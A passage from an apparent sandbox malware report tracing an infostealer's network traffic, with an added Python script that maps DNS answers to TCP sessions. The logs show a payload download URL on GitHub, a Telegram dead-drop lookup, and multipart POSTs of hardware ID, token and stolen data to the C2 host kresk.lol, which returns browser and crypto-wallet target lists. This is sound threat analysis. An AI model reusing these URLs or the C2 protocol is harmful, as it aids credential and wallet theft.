Dec 4, 2024 17:05:37.097898960 CET | 49871 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:05:37.098196983 CET | 49871 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:05:37.098212004 CET | 443 | 49871 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:05:38.513387918 CET | 443 | 49871 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:05:38.513514042 CET | 49871 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:05:38.516359091 CET | 49871 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:05:38.516369104 CET | 443 | 49871 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:05:38.518179893 CET | 49871 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:05:38.518191099 CET | 443 | 49871 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:05:39.464559078 CET | 443 | 49871 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:05:39.464627981 CET | 443 | 49871 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:05:39.464632988 CET | 49871 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:05:39.464678049 CET | 49871 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:05:39.464910984 CET | 49871 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:05:39.464925051 CET | 443 | 49871 | 159.69.102.165 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 4, 2024 17:04:17.799207926 CET | 62517 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 17:04:17.946419954 CET | 53 | 62517 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 17:04:20.526648045 CET | 54638 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 17:04:20.675065994 CET | 53 | 54638 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 17:04:23.801597118 CET | 54267 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 17:04:23.942056894 CET | 53 | 54267 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 17:04:25.900907040 CET | 56368 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 17:04:26.045279026 CET | 53 | 56368 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 17:04:41.658921003 CET | 54460 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 17:04:41.659158945 CET | 60846 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 17:04:41.741235971 CET | 53 | 58740 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 17:04:41.807408094 CET | 53 | 65179 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 17:04:41.807974100 CET | 53 | 54460 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 17:04:41.808159113 CET | 53 | 60846 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 17:04:44.808269978 CET | 53 | 62311 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 4, 2024 17:04:17.799207926 CET | 192.168.2.4 | 1.1.1.1 | 0x8a0a | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:20.526648045 CET | 192.168.2.4 | 1.1.1.1 | 0xcd49 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:23.801597118 CET | 192.168.2.4 | 1.1.1.1 | 0x760 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:25.900907040 CET | 192.168.2.4 | 1.1.1.1 | 0xfeb1 | Standard query (0) | kresk.lol | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:41.658921003 CET | 192.168.2.4 | 1.1.1.1 | 0x2d2f | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:41.659158945 CET | 192.168.2.4 | 1.1.1.1 | 0x8904 | Standard query (0) | www.google.com | 65 (HTTPS) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 4, 2024 17:04:17.946419954 CET | 1.1.1.1 | 192.168.2.4 | 0x8a0a | No error (0) | github.com | | 20.233.83.145 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:20.675065994 CET | 1.1.1.1 | 192.168.2.4 | 0xcd49 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:20.675065994 CET | 1.1.1.1 | 192.168.2.4 | 0xcd49 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:20.675065994 CET | 1.1.1.1 | 192.168.2.4 | 0xcd49 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:20.675065994 CET | 1.1.1.1 | 192.168.2.4 | 0xcd49 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:23.942056894 CET | 1.1.1.1 | 192.168.2.4 | 0x760 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:26.045279026 CET | 1.1.1.1 | 192.168.2.4 | 0xfeb1 | No error (0) | kresk.lol | | 159.69.102.165 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:41.807974100 CET | 1.1.1.1 | 192.168.2.4 | 0x2d2f | No error (0) | www.google.com | | 142.250.181.68 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:41.808159113 CET | 1.1.1.1 | 192.168.2.4 | 0x8904 | No error (0) | www.google.com | | | 65 (HTTPS) | IN (0x0001) | false
                                                                                                                                                                      • github.com
                                                                                                                                                                      • raw.githubusercontent.com
                                                                                                                                                                      • t.me
                                                                                                                                                                      • kresk.lol
                                                                                                                                                                      • www.google.com
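As an added example (not part of the Joe Sandbox report), the following Python script correlates the DNS answer table above with the TCP packet rows, so that each TLS session to 159.69.102.165 is attributed to the name that resolved to it (kresk.lol) and names that were resolved but never received a connection are listed separately. The rows embedded in it are constructed, pipe-delimited transcriptions of a subset of the report's tables; the github.com flow row is rebuilt from the HTTP session table (local port 49736 to 20.233.83.145:443) and its timestamp is assumed.

```python
"""Correlate a sandbox report's DNS answers with its TCP flow rows.
Added example, not part of the Joe Sandbox report: the rows below are
constructed transcriptions of a subset of the report's tables; the first
TCP row (github.com session) and its timestamp are assumed."""
from collections import defaultdict
from dataclasses import dataclass

LOCAL_IP = "192.168.2.4"  # the analysis VM's address in this report

# timestamp | src ip | dst ip | id | rcode | name | cname | address | type | class | DoH
DNS_ANSWERS = """\
Dec 4, 2024 17:04:17.946419954 CET | 1.1.1.1 | 192.168.2.4 | 0x8a0a | No error (0) | github.com | | 20.233.83.145 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:20.675065994 CET | 1.1.1.1 | 192.168.2.4 | 0xcd49 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:23.942056894 CET | 1.1.1.1 | 192.168.2.4 | 0x760 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:26.045279026 CET | 1.1.1.1 | 192.168.2.4 | 0xfeb1 | No error (0) | kresk.lol | | 159.69.102.165 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:41.807974100 CET | 1.1.1.1 | 192.168.2.4 | 0x2d2f | No error (0) | www.google.com | | 142.250.181.68 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 17:04:41.808159113 CET | 1.1.1.1 | 192.168.2.4 | 0x8904 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
"""

# timestamp | src port | dst port | src ip | dst ip  (first row constructed, see above)
TCP_ROWS = """\
Dec 4, 2024 17:04:19.000000000 CET | 49736 | 443 | 192.168.2.4 | 20.233.83.145
Dec 4, 2024 17:05:27.290306091 CET | 443 | 49846 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:05:27.717226982 CET | 49842 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:05:28.324201107 CET | 49849 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:05:28.324249029 CET | 443 | 49849 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:05:31.441133022 CET | 49856 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:05:34.600805044 CET | 49864 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:05:37.097775936 CET | 49871 | 443 | 192.168.2.4 | 159.69.102.165
"""


@dataclass(frozen=True)
class Flow:
    ts: str
    sport: int
    dport: int
    sip: str
    dip: str

    def remote(self, local_ip):
        """(remote_ip, remote_port, local_port), whichever direction the packet went."""
        if self.sip == local_ip:
            return self.dip, self.dport, self.sport
        return self.sip, self.sport, self.dport


def _cells(line):
    return [c.strip() for c in line.split("|")]


def parse_dns_answers(text):
    """Map answered address -> set of names; rows with no address (e.g. type 65) are skipped."""
    ip_to_names = defaultdict(set)
    for line in filter(str.strip, text.splitlines()):
        cells = _cells(line)
        name, address = cells[5], cells[7]
        if address:
            ip_to_names[address].add(name)
    return dict(ip_to_names)


def parse_tcp_rows(text):
    flows = []
    for line in filter(str.strip, text.splitlines()):
        ts, sport, dport, sip, dip = _cells(line)
        flows.append(Flow(ts, int(sport), int(dport), sip, dip))
    return flows


def correlate(dns_text, tcp_text, local_ip=LOCAL_IP):
    """Per remote endpoint: the DNS name(s) that resolved to it, the number of
    distinct local ports (one per TCP session) and the packet count.
    Endpoints no answer pointed at are keyed by their bare IP."""
    ip_to_names = parse_dns_answers(dns_text)
    local_ports, packets = defaultdict(set), defaultdict(int)
    for flow in parse_tcp_rows(tcp_text):
        rip, rport, lport = flow.remote(local_ip)
        local_ports[(rip, rport)].add(lport)
        packets[(rip, rport)] += 1
    summary = {}
    for (rip, rport), ports in local_ports.items():
        label = ",".join(sorted(ip_to_names.get(rip, {rip})))
        summary[label] = {"ip": rip, "port": rport,
                          "sessions": len(ports), "packets": packets[(rip, rport)]}
    return summary


def resolved_but_unused(dns_text, tcp_text, local_ip=LOCAL_IP):
    """Names that were resolved but none of whose addresses saw a TCP flow."""
    contacted = {f.remote(local_ip)[0] for f in parse_tcp_rows(tcp_text)}
    seen, used = set(), set()
    for ip, names in parse_dns_answers(dns_text).items():
        seen |= names
        if ip in contacted:
            used |= names
    return sorted(seen - used)


if __name__ == "__main__":
    for label, info in correlate(DNS_ANSWERS, TCP_ROWS).items():
        print(f"{label:<12} {info['ip']}:{info['port']}  sessions={info['sessions']}  packets={info['packets']}")
    print("resolved but never contacted:", resolved_but_unused(DNS_ANSWERS, TCP_ROWS))
```

The session count comes from distinct local ports rather than from packet counts, because every row of the report is one packet and a single TLS session to 159.69.102.165 spans dozens of them; the direction-independent `remote()` key is what lets client-to-server and server-to-client rows land on the same session. Names that resolve but are never contacted (t.me and www.google.com in the subset above) are worth listing on their own: a stealer that resolves a Telegram or Google host may be using it only as a connectivity or dead-drop check, and a resolution without a flow is a different indicator from a full session.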
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 20.233.83.145 | 443 | 736 | C:\Users\user\Desktop\Ttok18.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:04:19 UTC | 114 | OUT |
GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1
                                                                                                                                                                      Host: github.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2024-12-04 16:04:20 UTC565INHTTP/1.1 302 Found
                                                                                                                                                                      Server: GitHub.com
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:20 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                      Access-Control-Allow-Origin:
                                                                                                                                                                      Location: https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      Referrer-Policy: no-referrer-when-downgrade
2024-12-04 16:04:20 UTC | 3378 | IN | Data Raw: (hex dump omitted)
Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 185.199.111.133 | 443 | 736 | C:\Users\user\Desktop\Ttok18.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:04:21 UTC | 125 | OUT | GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-12-04 16:04:22 UTC | 900 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 476160
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "fab0c349a347a91ca7e8afd2bad974668e7a1ce50c0b2f5ed6f73ab561c31a75"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: C6FC:BBA70:B6819F:C656D5:67507D86
Accept-Ranges: bytes
Date: Wed, 04 Dec 2024 16:04:22 GMT
Via: 1.1 varnish
X-Served-By: cache-ewr-kewr1740043-EWR
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1733328262.164687,VS0,VE15
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: e03ffdc9f0139f790f036223f798f6c3d978bfee
Expires: Wed, 04 Dec 2024 16:09:22 GMT
Source-Age: 0
2024-12-04 16:04:22 UTC | 1378 | IN | Data Raw: (hex dump omitted)
Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELMg@(H


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 149.154.167.99 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:04:25 UTC | 85 | OUT | GET /m3wm0w HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-04 16:04:25 UTC | 512 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:04:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12292
Connection: close
Set-Cookie: stel_ssid=9256b388006b3be786_11504526215122129733; expires=Thu, 05 Dec 2024 16:04:25 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2024-12-04 16:04:25 UTC | 12292 | IN | Data Raw: (hex dump omitted)
Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 159.69.102.165 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:04:27 UTC | 224 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: kresk.lol
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-04 16:04:28 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 Dec 2024 16:04:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-04 16:04:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4 | Source: 192.168.2.4:49740 | Destination: 159.69.102.165:443 | PID: 8080 | Process: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-04 16:04:29 UTC  316 bytes  OUT  POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----WB1V3OP8YMYM7YMGD2N7
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
    Host: kresk.lol
    Content-Length: 256
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-04 16:04:29 UTC  256 bytes  OUT  Data Ascii: ------WB1V3OP8YMYM7YMGD2N7Content-Disposition: form-data; name="hwid"405BB53ECE592398989009-a33c7340-61ca------WB1V3OP8YMYM7YMGD2N7Content-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------WB1V3OP8YMYM7YMGD2N7--
2024-12-04 16:04:30 UTC  158 bytes  IN   HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 04 Dec 2024 16:04:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-12-04 16:04:30 UTC  70 bytes   IN   Data Ascii: 3b1|1|1|1|6aeb446e65e3de6e8bd63f79e11152e9|1|1|1|0|0|100000|10


Session ID: 5 | Source: 192.168.2.4:49741 | Destination: 159.69.102.165:443 | PID: 8080 | Process: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-04 16:04:32 UTC  316 bytes  OUT  POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----RIMOH4WLXBIMYMG4OHVS
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
    Host: kresk.lol
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-04 16:04:32 UTC  331 bytes  OUT  Data Ascii: ------RIMOH4WLXBIMYMG4OHVSContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------RIMOH4WLXBIMYMG4OHVSContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------RIMOH4WLXBIMYMG4OHVSCont
2024-12-04 16:04:33 UTC  158 bytes  IN   HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 04 Dec 2024 16:04:32 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-12-04 16:04:33 UTC  2192 bytes IN   Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID: 6 | Source: 192.168.2.4:49742 | Destination: 159.69.102.165:443 | PID: 8080 | Process: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-04 16:04:34 UTC  316 bytes  OUT  POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----00HVS2NY5XBAAA1NG4OZ
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
    Host: kresk.lol
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-04 16:04:34 UTC  331 bytes  OUT  Data Ascii: ------00HVS2NY5XBAAA1NG4OZContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------00HVS2NY5XBAAA1NG4OZContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------00HVS2NY5XBAAA1NG4OZCont
2024-12-04 16:04:35 UTC  158 bytes  IN   HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 04 Dec 2024 16:04:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-12-04 16:04:35 UTC  5837 bytes IN   Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID: 7 | Source: 192.168.2.4:49743 | Destination: 159.69.102.165:443 | PID: 8080 | Process: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-04 16:04:36 UTC  316 bytes  OUT  POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----TJMY5FKXBA1N7YM79ZMO
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
    Host: kresk.lol
    Content-Length: 332
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-04 16:04:36 UTC  332 bytes  OUT  Data Ascii: ------TJMY5FKXBA1N7YM79ZMOContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------TJMY5FKXBA1N7YM79ZMOContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------TJMY5FKXBA1N7YM79ZMOCont
2024-12-04 16:04:37 UTC  158 bytes  IN   HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 04 Dec 2024 16:04:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-12-04 16:04:37 UTC  119 bytes  IN   Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID: 8 | Source: 192.168.2.4:49744 | Destination: 159.69.102.165:443 | PID: 8080 | Process: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-04 16:04:39 UTC  317 bytes  OUT  POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----MOP8G4OPZ58YUAA1D26P
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
    Host: kresk.lol
    Content-Length: 6837
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-04 16:04:39 UTC  6837 bytes OUT  Data Ascii: ------MOP8G4OPZ58YUAA1D26PContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------MOP8G4OPZ58YUAA1D26PContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------MOP8G4OPZ58YUAA1D26PCont
2024-12-04 16:04:40 UTC  158 bytes  IN   HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 04 Dec 2024 16:04:40 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-12-04 16:04:40 UTC  12 bytes   IN   Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 2ok0


Session ID: 9 | Source: 192.168.2.4:49745 | Destination: 159.69.102.165:443 | PID: 8080 | Process: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-04 16:04:40 UTC  316 bytes  OUT  POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----MOP8G4OPZ58YUAA1D26P
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
    Host: kresk.lol
    Content-Length: 489
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-04 16:04:40 UTC  489 bytes  OUT  Data Ascii: ------MOP8G4OPZ58YUAA1D26PContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------MOP8G4OPZ58YUAA1D26PContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------MOP8G4OPZ58YUAA1D26PCont
2024-12-04 16:04:41 UTC  158 bytes  IN   HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 04 Dec 2024 16:04:41 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-12-04 16:04:41 UTC  12 bytes   IN   Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 2ok0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
10         | 192.168.2.4 | 49751       | 142.250.181.68 | 443              | 5020 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp               | Bytes transferred | Direction | Data
2024-12-04 16:04:43 UTC | 615               | OUT       | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-04 16:04:44 UTC | 1266              | IN        | HTTP/1.1 200 OK
Date: Wed, 04 Dec 2024 16:04:44 GMT
Pragma: no-cache
Expires: -1
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-iJYtYAyxvxRfeWcrUHnesw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2024-12-04 16:04:44 UTC | 124               | IN        | Data Raw: 63 35 32 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 70 61 74 68 20 6f 66 20 65 78 69 6c 65 20 65 61 72 6c 79 20 61 63 63 65 73 73 20 63 6c 61 73 73 65 73 22 2c 22 73 75 72 76 69 76 69 6e 67 20 62 61 72 73 74 6f 6f 6c 20 63 61 73 74 22 2c 22 70 72 69 6e 63 65 73 73 20 63 72 75 69 73 65 73 20 6d 61 6e 20 6f 76 65 72 62 6f 61 72 64 22 2c 22 73 70 6f 74 69 66 79 20 77 72 61 70
Data Ascii: c52)]}'["",["path of exile early access classes","surviving barstool cast","princess cruises man overboard","spotify wrap
